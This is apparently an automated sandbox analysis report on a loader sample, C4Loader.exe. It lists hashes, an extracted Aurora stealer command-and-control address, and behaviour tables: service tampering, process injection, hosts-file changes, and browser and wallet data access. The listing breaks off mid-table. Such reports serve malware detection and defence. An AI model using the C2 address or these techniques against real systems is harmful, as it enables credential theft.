Analysis
max time kernel: 134s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-03-2023 21:50
Static task: static1
Behavioral task: behavioral1
  Sample: C4Loader.exe
  Resource: win7-20230220-en
General
Target: C4Loader.exe
Size: 687.8MB
MD5: 66a41bcddbef0ad226adda334fc38ae6
SHA1: 3128d77a2d71d1fc520d302f2d6a12f0c3c47a09
SHA256: 36f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a
SHA512: 541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea
SSDEEP: 3072:ZwiwPz+huH7liXb6QF45A6Nmn0+Q/ycdIwYioOAg0FujDgtNs1bDew:CiEoX2Qm5A10+QacpDAOIs1bDew
Malware Config
Extracted
aurora
107.182.129.73:8081
Signatures
Modifies security service 2 TTPs 5 IoCs
Processes:
  description | ioc | process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Suspicious use of NtCreateProcessExOtherParentProcess 10 IoCs
Processes:
  description | pid | process | target process
  PID 1932 created 4776 | 1932 | WerFault.exe | DllHost.exe
  PID 3184 created 2416 | 3184 | WerFault.exe | DllHost.exe
  PID 4984 created 2464 | 4984 | WerFault.exe | DllHost.exe
  PID 5008 created 216 | 5008 | WerFault.exe | DllHost.exe
  PID 3820 created 3632 | 3820 | DllHost.exe | DllHost.exe
  PID 2704 created 4160 | 2704 | WerFault.exe | DllHost.exe
  PID 3916 created 4188 | 3916 | WerFault.exe | DllHost.exe
  PID 2908 created 3760 | 2908 | WerFault.exe | DllHost.exe
  PID 2236 created 3820 | 2236 | WerFault.exe | DllHost.exe
  PID 3168 created 2656 | 3168 | WerFault.exe | DllHost.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 18 IoCs
Processes:
  description | pid | process | target process
  PID 2072 created 3160 | 2072 | SmartDefRun.exe | Explorer.EXE
  PID 2072 created 3160 | 2072 | SmartDefRun.exe | Explorer.EXE
  PID 2072 created 3160 | 2072 | SmartDefRun.exe | Explorer.EXE
  PID 2072 created 3160 | 2072 | SmartDefRun.exe | Explorer.EXE
  PID 5072 created 608 | 5072 | powershell.EXE | winlogon.exe
  PID 2468 created 2000 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 4776 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 4772 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 2416 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 2464 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 216 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 5052 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 3632 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 4160 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 4188 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 3760 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 3820 | 2468 | svchost.exe | DllHost.exe
  PID 2468 created 2656 | 2468 | svchost.exe | DllHost.exe
Blocklisted process makes network request 1 IoCs
Processes:
  flow | pid | process
  27 | 212 | powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\System32\drivers\etc\hosts | SmartDefRun.exe
Stops running service(s) 3 TTPs
Executes dropped EXE 5 IoCs
Processes:
  pid | process
  4524 | C4Loader.exe
  4900 | new2.exe
  2864 | SysApp.exe
  2072 | SmartDefRun.exe
  2956 | fodhelper.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Drops file in System32 directory 10 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | svchost.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
Suspicious use of SetThreadContext 3 IoCs
Processes:
  description | pid | process | target process
  PID 4892 set thread context of 2336 | 4892 | C4Loader.exe | RegSvcs.exe
  PID 2072 set thread context of 3864 | 2072 | SmartDefRun.exe | dialer.exe
  PID 5072 set thread context of 4716 | 5072 | powershell.EXE | dllhost.exe
Drops file in Program Files directory 1 IoCs
Processes:
  description | ioc | process
  File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | SmartDefRun.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  3988 | sc.exe
  2312 | sc.exe
  3376 | sc.exe
  2176 | sc.exe
  1904 | sc.exe
Program crash 17 IoCs
Processes:
  pid | pid_target | process | target process
  2096 | 4892 | WerFault.exe | C4Loader.exe
  1236 | 3524 | WerFault.exe | DllHost.exe
  3920 | 3656 | WerFault.exe | DllHost.exe
  1504 | 2000 | WerFault.exe | DllHost.exe
  2236 | 4776 | WerFault.exe | DllHost.exe
  2804 | 4772 | WerFault.exe | DllHost.exe
  5000 | 2416 | WerFault.exe | DllHost.exe
  4448 | 2464 | WerFault.exe | DllHost.exe
  3976 | 216 | WerFault.exe | DllHost.exe
  4944 | 3632 | WerFault.exe | DllHost.exe
  3300 | 5052 | WerFault.exe | DllHost.exe
  4876 | 4160 | WerFault.exe | DllHost.exe
  316 | 4188 | WerFault.exe | DllHost.exe
  3624 | 3760 | WerFault.exe | DllHost.exe
  4080 | 3820 | WerFault.exe | DllHost.exe
  3824 | 2656 | WerFault.exe | DllHost.exe
  1396 | 2428 | WerFault.exe |
Checks processor information in registry 2 TTPs 45 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Enumerates system info in registry 2 TTPs 30 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid | process
  212 | powershell.exe
  212 | powershell.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2864 | SysApp.exe
  2072 | SmartDefRun.exe
  2072 | SmartDefRun.exe
  2068 | powershell.exe
  2068 | powershell.exe
  2072 | SmartDefRun.exe
  2072 | SmartDefRun.exe
  2072 | SmartDefRun.exe
  2072 | SmartDefRun.exe
  1084 | powershell.exe
  1084 | powershell.exe
  2072 | SmartDefRun.exe
  2072 | SmartDefRun.exe
  5072 | powershell.EXE
  4448 | powershell.EXE
  5072 | powershell.EXE
  4448 | powershell.EXE
  5072 | powershell.EXE
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  2468 | svchost.exe
  2468 | svchost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  2468 | svchost.exe
  2468 | svchost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
  4716 | dllhost.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
  pid | process
  3160 | Explorer.EXE
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 212 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 4616 | wmic.exe
  Token: SeSecurityPrivilege | 4616 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 4616 | wmic.exe
  Token: SeLoadDriverPrivilege | 4616 | wmic.exe
  Token: SeSystemProfilePrivilege | 4616 | wmic.exe
  Token: SeSystemtimePrivilege | 4616 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 4616 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 4616 | wmic.exe
  Token: SeCreatePagefilePrivilege | 4616 | wmic.exe
  Token: SeBackupPrivilege | 4616 | wmic.exe
  Token: SeRestorePrivilege | 4616 | wmic.exe
  Token: SeShutdownPrivilege | 4616 | wmic.exe
  Token: SeDebugPrivilege | 4616 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 4616 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 4616 | wmic.exe
  Token: SeUndockPrivilege | 4616 | wmic.exe
  Token: SeManageVolumePrivilege | 4616 | wmic.exe
  Token: 33 | 4616 | wmic.exe
  Token: 34 | 4616 | wmic.exe
  Token: 35 | 4616 | wmic.exe
  Token: 36 | 4616 | wmic.exe
  Token: SeIncreaseQuotaPrivilege | 4616 | wmic.exe
  Token: SeSecurityPrivilege | 4616 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 4616 | wmic.exe
  Token: SeLoadDriverPrivilege | 4616 | wmic.exe
  Token: SeSystemProfilePrivilege | 4616 | wmic.exe
  Token: SeSystemtimePrivilege | 4616 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 4616 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 4616 | wmic.exe
  Token: SeCreatePagefilePrivilege | 4616 | wmic.exe
  Token: SeBackupPrivilege | 4616 | wmic.exe
  Token: SeRestorePrivilege | 4616 | wmic.exe
  Token: SeShutdownPrivilege | 4616 | wmic.exe
  Token: SeDebugPrivilege | 4616 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 4616 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 4616 | wmic.exe
  Token: SeUndockPrivilege | 4616 | wmic.exe
  Token: SeManageVolumePrivilege | 4616 | wmic.exe
  Token: 33 | 4616 | wmic.exe
  Token: 34 | 4616 | wmic.exe
  Token: 35 | 4616 | wmic.exe
  Token: 36 | 4616 | wmic.exe
  Token: SeIncreaseQuotaPrivilege | 5032 | WMIC.exe
  Token: SeSecurityPrivilege | 5032 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 5032 | WMIC.exe
  Token: SeLoadDriverPrivilege | 5032 | WMIC.exe
  Token: SeSystemProfilePrivilege | 5032 | WMIC.exe
  Token: SeSystemtimePrivilege | 5032 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 5032 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 5032 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 5032 | WMIC.exe
  Token: SeBackupPrivilege | 5032 | WMIC.exe
  Token: SeRestorePrivilege | 5032 | WMIC.exe
  Token: SeShutdownPrivilege | 5032 | WMIC.exe
  Token: SeDebugPrivilege | 5032 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 5032 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 5032 | WMIC.exe
  Token: SeUndockPrivilege | 5032 | WMIC.exe
  Token: SeManageVolumePrivilege | 5032 | WMIC.exe
  Token: 33 | 5032 | WMIC.exe
  Token: 34 | 5032 | WMIC.exe
  Token: 35 | 5032 | WMIC.exe
  Token: 36 | 5032 | WMIC.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process
  PID 4892 wrote to memory of 2336 | 4892 | C4Loader.exe | RegSvcs.exe
  PID 4892 wrote to memory of 2336 | 4892 | C4Loader.exe | RegSvcs.exe
  PID 4892 wrote to memory of 2336 | 4892 | C4Loader.exe | RegSvcs.exe
  PID 4892 wrote to memory of 2336 | 4892 | C4Loader.exe | RegSvcs.exe
